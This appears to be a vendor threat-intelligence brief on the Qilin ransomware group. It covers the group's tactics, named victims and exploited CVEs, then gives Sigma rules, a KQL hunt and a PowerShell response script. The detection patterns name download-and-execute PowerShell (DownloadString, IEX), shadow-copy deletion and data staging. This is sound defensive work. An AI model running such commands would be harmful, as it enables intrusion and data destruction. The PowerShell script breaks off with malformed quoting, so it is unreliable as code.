Aliases: Agenda, Titan
Operating Model: Ransomware-as-a-Service (RaaS). Qilin operates on an affiliate model, recruiting diverse threat actors who conduct initial access and network intrusions, while the core team develops the Rust-based encryption payload.
Tactics & Extortion: Qilin is a proponent of "double extortion." They exfiltrate sensitive corporate data prior to encryption and threaten to release it on their .onion leak site if negotiations fail. Ransom demands vary significantly based on victim revenue but typically range from $500,000 to several million USD.
Initial Access Vectors: Current intelligence indicates heavy reliance on exploiting vulnerabilities in external-facing remote access solutions. Specifically, affiliates are targeting VPN appliances (Check Point, Cisco) and remote management tools (ConnectWise ScreenConnect). Phishing with macro-laden documents remains a secondary vector.
Dwell Time: Qilin affiliates typically dwell for 3 to 10 days before detonating the encryption payload, utilizing this time for lateral movement, credential dumping, and large-scale data staging.
Current Campaign Analysis
Sector Targeting: The latest batch of 16 victims reveals a distinct pivot towards the Construction sector (5 victims: Schumacher Homes, Florida Engineering Services, PJ Daly Contracting, Homes By J Anthony, Makel Companies Group). Manufacturing remains a consistent secondary target (3 victims), while the attack on the Central Bank of Libya signals a high-value incursion into Financial Services.
Geographic Concentration: The campaign is heavily US-centric (7 victims), but increasingly global. Recent hits span Libya, Thailand, Taiwan, Germany, Ireland, France, Chile, and Turkey, suggesting a broad, opportunistic spray targeting vulnerable internet-facing infrastructure rather than region-specific spear-phishing.
Victim Profile: Victims are primarily mid-market enterprises. The construction firms targeted are regional entities with significant operational technology (OT) or project management data, likely holding sensitive client blueprints and financial data attractive for extortion.
CVE Correlation: The victimology correlates strongly with the active exploitation of:
- CVE-2024-1708 (ConnectWise ScreenConnect): Widely used by MSPs managing IT for construction and manufacturing firms.
- CVE-2026-50751 (Check Point Security Gateway): Critical for perimeter security in the financial and telecommunication sectors (e.g., Central Bank of Libya, Sivatel Bangkok).
- CVE-2026-20131 (Cisco Secure Firewall): Exploitation aligns with the network perimeter breaches required to access the geographically dispersed victims.
Detection Engineering
SIGMA Rules
---
title: Potential ConnectWise ScreenConnect Remote Code Execution
description: Detects potential exploitation of CVE-2024-1708 or suspicious usage of ScreenConnect Client Service spawning shells.
author: Security Arsenal Research
date: 2026/06/22
status: experimental
tags:
- attack.initial_access
- attack.t1190
- cve.2024.1708
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\ScreenConnect.ClientService.exe'
NewProcessName|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\pwsh.exe'
condition: selection
falsepositives:
- Legitimate administrative use by IT support
level: high
---
title: Microsoft Exchange Deserialization Gadget Activity
description: Detects suspicious process execution patterns associated with CVE-2023-21529 deserialization exploits.
author: Security Arsenal Research
date: 2026/06/22
status: experimental
tags:
- attack.initial_access
- attack.t1190
- cve.2023.21529
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\w3wp.exe'
NewProcessName|endswith:
- '\powershell.exe'
- '\cmd.exe'
CommandLine|contains:
- 'Add-Type'
- 'DownloadString'
filter:
User|contains: 'IIS APPPOOL'
condition: selection and not filter
falsepositives:
- Legitimate Exchange administration scripts
level: critical
---
title: Suspicious Cobalt Strike Beacon Execution
author: Security Arsenal Research
date: 2026/06/22
description: Detects typical command line arguments used by Cobalt Strike beacons, a common lateral movement tool for Qilin affiliates.
status: experimental
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
NewProcessName|endswith: '\powershell.exe'
CommandLine|contains:
- 'DownloadString'
- 'IEX'
selection_ip:
CommandLine|re: '.*\b(https?://[^/]+/.*\.js|https?://[^/]+/api/\w+)\b.*'
condition: all of selection*
falsepositives:
- Legitimate system administration scripts
level: high
KQL (Microsoft Sentinel)
// Hunt for lateral movement and mass data staging common in Qilin incidents
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where ProcessName hasAny ("powershell.exe", "cmd.exe", "robocopy.exe", "rclone.exe", "wbadmin.exe")
| where ProcessCommandLine has_any ("shadowcopy", "delete", "copy", "mirror", "/b", "/zb")
| where InitiatingProcessAccountName != "SYSTEM"
| project Timestamp, DeviceName, AccountName, ProcessName, ProcessCommandLine, InitiatingProcessFileName
| order by Timestamp desc
| extend IOCLink = iff(ProcessCommandLine contains "shadowcopy", "VSS Deletion", "File Staging")
PowerShell Response Script
<#
.SYNOPSIS
Qilin Ransomware T-Minus Response Script
.DESCRIPTION
Checks for common Qilin persistence mechanisms and pre-encryption staging indicators.
#>
Write-Host "[+] Checking for recently created Scheduled Tasks (Persistence)..."
Get-ScheduledTask | Where-Object {$_.Date -gt (Get-Date).AddHours(-24)} | Select-Object TaskName, TaskPath, Date, Author
Write-Host "[+] Checking for VSS Shadow Copy Deletion attempts (Event ID 4688)..."
$VSSEvents = Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4688)]] and *[EventData[Data='vssadmin.exe']]" -ErrorAction SilentlyContinue -MaxEvents 10
if ($VSSEvents) { $VSSEvents | Select-Object TimeCreated, Message } else { Write-Host "No recent vssadmin execution found." }
Write-Host "[+] Scanning for common ransomware extensions in user directories..."
$Paths = @("C:\Users", "D:")
$Extensions = @("*.qilin", *.encrypted", *.locked", ".*.
Is your security operations ready?
Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.